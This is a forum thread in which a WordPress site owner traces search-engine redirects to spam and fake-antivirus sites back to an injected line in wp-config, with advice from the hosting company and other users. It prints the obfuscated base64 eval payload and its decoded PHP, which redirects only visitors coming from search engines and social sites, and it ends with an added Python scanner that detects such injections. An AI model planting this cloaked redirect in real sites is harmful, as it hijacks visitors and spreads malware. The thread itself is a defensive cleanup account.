Webpage being directed to SPAM

Hi guys,

I have an issue, but on closer inspection the issue might be browser related.

I am not entirely sure what’s happening on my site, but I seem to get redirected from the site on Google to another site called “http://monkeyball.osa.pl/?said=3333g&q=corporate+identity+cyprus”. If you type Cyprus Corporate Identity you get my site near the top, it’s with a PricklyPear. From here, on my browser anyhow, I get directed to this spam site. It was happening before when I set the site to Multisite.

Can anybody let me know why this is happening? I myself think it might be a browser-related issue; maybe on outside machines something else happens.

I’ve just tried that using Yahoo! (because I wasn’t paying attention to what I was doing :slight_smile: ) and your site came up top. Clicking on the link got me

Oops! Google Chrome could not find aruba.345.pl

345.pl and osa.pl both have very poor ratings on WOT; McAfee site advisor hasn’t ranked the first one, but about the second it says:

McAfee TrustedSource web reputation analysis found potential security risks with this site. Use with extreme caution.
I don’t know what’s going on, but it seems pretty safe to say it’s not an issue with your browser. :slight_smile:

That makes things even worse! Can anybody assist me on this? I use Site5 as my host, I can probably flag the issue up with them, but maybe it would be good to see what people say here before I do anything.

OK - I tried again with Google and a different browser, and I got this:

I have no problem if I visit the site direct, so I don’t know what’s going on here.

Aruba is not my website though. This is another website. I am going to have to flag this up to the hosts. I have no idea what’s going on.

Sorry - I meant I can visit pricklypear direct without any problems.

I know the site can be visited directly without any issue. I am on LIVE chat with the hosting company and seeing what they can do, if anything. I am really unsure what’s going on, it’s all very strange.

Strange - I’ve tried with several browsers and Google is sending me to pricklypear as it should do, nothing dodgy at all.

Something is up. Ran a search on Google and when visiting your homepage I get:

Warning: Something’s Not Right Here!
www3.bestscannerfyn.rr.nu contains malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified www3.bestscannerfyn.rr.nu that we found malware on the site. For more about the problems found on www3.bestscannerfyn.rr.nu, visit the Google Safe

The other pages I clicked are redirecting to something weird as well. What does the host say?

I’d say the site has been compromised.

Nothing at the moment. The lady opened a ticket to flag up to the Technical team, I am unsure what they will say. Aren’t hosts supposed to protect against this thing? I feel something is playing in the domain name. I did a virus scan and it checked all the files and they seemed to be okay, I am not sure what else to do. I am using WP as the site suggests. I use a CDN but I don’t think that’s doing anything bad.

The word is in from the host.

[quote="Site5 Hosting"]

Hello,

What is occurring, at least from my end while using firefox, is that the page is showing:

“Reported attack page”

This type of error will also be dependent on the browser being used.

The particular page in question (my URL) however appears to have been compromised and is redirecting to a 3rd party website, that then attempts to install a fake anti-virus.

As someone has reported the site to google, users who use firefox/google toolbar in Internet Explorer will get the message that the page has been reported as an attack page.

When this occurs, what usually occurs is that an individual website will get compromised by a 3rd party and a script will get modified. The script is then usually modified with a link to a 3rd party location where the virus/scamware is located and then when a viewer goes to your website the virus will be downloaded from the 3rd party location.

This usually occurs due to:

  1. outdated / insecure scripts
  2. scripts that are prone to “sql injections”
  3. Insecure passwords, especially FTP passwords.
  4. Installing plugins/extensions without verifying that they are legitimate. There exists some that are specifically designed to “take over” websites.

Most common types of scripts are:

  1. Forums
  2. Contact forms
  3. Any kind of input forms
  4. Blogs

What needs to be done:

  1. Change any passwords you have. Make sure new passwords are at least 8 digits long and do not use any words found in the dictionary. Passwords should include at least 2 numbers, 2 digits, and be random.

  2. Review any scripts you have for any content that you did not put in them.

  3. If you have any backups of your site, you may need to restore to the backup. If you do not have a backup but the issue is less than 30 days old, we can restore from one of our backups. You can request a restore via https://backstage.site5.com/client/addons/backup_restore

While it is impossible for us to scan website code, due to the trillions of possible variations of code out there, for possible links to viruses that are hosted on other servers, we can run an audit on your account that will look for possible vulnerabilities such as outdated scripts or other common vulnerabilities. While this does not look for all possible vulnerabilities it does look for some common vulnerabilities.

NOTE: This needs to be done AFTER the site has been put into a pre-compromised state.

If you would like this performed, as it will involve revealing account specific information for security purposes please provide:

What is your favorite pet’s name?

4 first digits of your ID card

Once we have the above, we can then proceed.

Thanks,

Troy LaClaire
Support Specialist, Site5.com

[/quote]

The hosts are really amazing, they eventually found the issue and cause of the problem.

eval(base64_decode("…2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29udGVudG8uYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ=="));

was found at the top of the wp-config file.

This translates to:

error_reporting(0);                        // hide any PHP warnings from the visitor
$qazplm=headers_sent();
if (!$qazplm){                             // only act while a redirect header can still be sent
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        // fire only for visitors arriving from a search engine, social site or URL shortener,
        // so the owner typing the address in directly never sees the redirect
        if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\\.ru\\/yandsearch\\?(.*?)\\&lr\\=/",$referer) or preg_match ("/google\\.(.*?)\\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                header("Location: http://broadway.bee.pl/");   // bounce the visitor to the spam site
                exit();
            }
        }
    }
}

This made my website marked as SPAM! Apart from being listed on the top rank for Cyprus Corporate Identity I would be shunning business away with this spam. My host gave me excellent advice on keeping my WP installation and virus free. I feel this malicious code was part of a plug-in to do with social media.

I will think twice before I see any base code on my site!

I have found nothing on Google about this malicious code, so I hope this thread can be found by many to resolve an issue which took all day to resolve. Thanks again, and I am glad my site is now back to normal. Phew!

I just wanted to check and make sure this got resolved ok? Our support would be happy to help,

Thanks, Ben
Site5 CEO

The issue was resolved, they did a brilliant job. The actual issue was a line of code which created the redirect.

I did something else when putting the security plug-ins which caused another issue and now I can’t log onto the CMS. I will try to solve this, if push comes to shove I will probably recreate the blog since I have the backups. I really don’t want to ask your team to help again, they did an amazing job and it’s not fair for me to ask for their help on my inexperience.

Kind regards,

I’m glad to hear they could help! Don’t worry that is what we are for if you need help :slight_smile:

Thanks, Ben

I just had a similar issue with one of my hosted customers but the issue didn’t stop at just the wp-config file. In fact, they injected this code into several dozen of my files scattered throughout.

The best way to identify the files that contain this code is to look at the timestamp or date of modification on each file containing the code snippet. Each file had exactly the same time and date, which made it obvious for me to see which files were modified to contain this injected script.

All the basic WordPress files I simply uploaded over again using a clean WordPress install, but the wp-config and wp-content folders took some time to go through manually. They must have had some automated method of adding this to files because they were all at exactly the same time but also so many files were infected… I didn’t see any obvious areas, but this was injected into plugin and theme files without discrimination.

It’s a time consuming one to fix, but once you’re done… you are good to go. Hope this helps.
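A scanner that combines the two checks this thread describes: find every eval(base64_decode("...")) line like the one pulled out of wp-config, decode it to see whether it is the referrer-keyed redirect, and group the hits by modification time, which is dr00t's tell for a mass injection. This is an added example, not code from the thread or from Site5; the sample files and the spam.example host are constructed placeholders.

```python
import base64
import os
import re
import tempfile
from collections import defaultdict
from pathlib import Path

INJECT_RE = re.compile(r'eval\(base64_decode\("([A-Za-z0-9+/=]+)"\)\)')  # form found in wp-config above
REDIRECT_TOKENS = ("HTTP_REFERER", "stristr(", 'header("Location:')  # marks of a referrer-keyed redirect
# Constructed payload (placeholder spam host), same shape as the decoded wp-config code above.
SAMPLE_PAYLOAD = ('error_reporting(0); $r=$_SERVER["HTTP_REFERER"]; '
                  'if (stristr($r,"google")) { header("Location: http://spam.example/"); exit(); }')

def scan_file(path):
    """Return the decoded payload of every eval(base64_decode(...)) found in one file."""
    out = []
    for m in INJECT_RE.finditer(Path(path).read_text(encoding="utf-8", errors="replace")):
        b64 = m.group(1) + "=" * (-len(m.group(1)) % 4)   # tolerate stripped padding
        out.append(base64.b64decode(b64).decode("utf-8", "replace"))
    return out

def is_referrer_redirect(payload):
    """True when the decoded code keys off the referrer and issues a Location header."""
    return all(tok in payload for tok in REDIRECT_TOKENS)

def scan_tree(root):
    """Group every infected .php file under root by mtime (dr00t's identical-timestamp tell)."""
    by_mtime = defaultdict(list)
    for path in Path(root).rglob("*.php"):
        payloads = scan_file(path)
        if payloads:
            by_mtime[int(path.stat().st_mtime)].append((path.relative_to(root).as_posix(), payloads))
    return dict(by_mtime)

def build_sample_tree(root):
    """Constructed fixture: two injected files sharing one mtime, plus one clean file."""
    injected = f'<?php\neval(base64_decode("{base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()}"));\n'
    files = {"wp-config.php": injected + 'define("DB_NAME", "wp");\n',
             "wp-content/themes/t/functions.php": injected, "index.php": "<?php\necho 'clean';\n"}
    for rel, body in files.items():
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(body, encoding="utf-8")
        if rel != "index.php":        # mass injection leaves identical timestamps
            os.utime(path, (1300000000, 1300000000))

def demo():
    with tempfile.TemporaryDirectory() as root:  # fixture exists only for the scan
        build_sample_tree(root)
        return scan_tree(root)
```

Run scan_tree against a real document root and any mtime bucket with many files is the one to restore from backup; the clean index.php in the fixture shows that untouched files never appear in the report.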

Since then I’ve done loads to prevent hacks. SSL certification all around, bulletproofing my WP installation. This might have been my website, but it would have been much worse if it was on a clients site. Relatively easy to setup.

@dr00t;

Your example was far worse than mine, so I feel for you. What steps do you now take to prevent such a recurrence?